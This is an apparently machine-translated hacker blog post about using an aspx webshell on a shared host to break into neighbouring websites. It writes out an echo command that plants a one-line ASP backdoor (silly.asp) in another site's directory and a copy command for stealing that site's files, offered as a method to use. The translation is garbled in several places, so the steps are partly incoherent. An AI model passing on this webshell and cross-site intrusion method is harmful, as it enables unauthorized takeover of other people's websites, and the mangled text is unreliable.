Summary on permission escalation for websites supporting aspx

Author: foolishqiang Original article address: http://hi.baidu.com/foolishqiang

Here, I just want to tell you about it:

The permission of aspx must be larger than that of asp. the permission of asp is smaller than that of guest, and that of aspx is similar to that of user.

So obviously,

Let me give you two examples:

The first one is that we cannot jump to website B when we are not paying attention to it, but the server supports aspx.

Now let's see if we can execute cmd. If we upload net1 and cmd ourselves, if we can execute it, the probability of winning the target site is about 70 80.

We can write a sentence to the target station, or we do not have the write permission, but we have the read permission, we can completely copy a file from the target station to the directory of our site.

I know many people will not understand it. For example:

Execute echo ^ <^ % execute request ("foolishqiang") ^ % ^> In the aspx script. asp

In this way, there will be a Trojan horse in the target station and Directory: Silly. asp.

If you do not understand, you only need to execute this sentence in the shell of your site, and then link the target site address with a single sentence + silly. asp

Check whether it is hello. Haha.

If we do not have the write permission, I think we will certainly have the read permission.

Construction statement:

Copy target website/index.htm website

Haha, a file has been copied. What is it like?

Does it look like a new cloud's old vulnerability? Then we can download the files on the target site.

See how you used it.

Let me explain to you. If the cmd component of the target site is deleted, as long as most websites support aspx, we can completely bypass the cmd component (most sites ), let's construct a local cmd command and execute it remotely to see if this article is helpful?

I am only here for the purpose of attracting others. Don't laugh.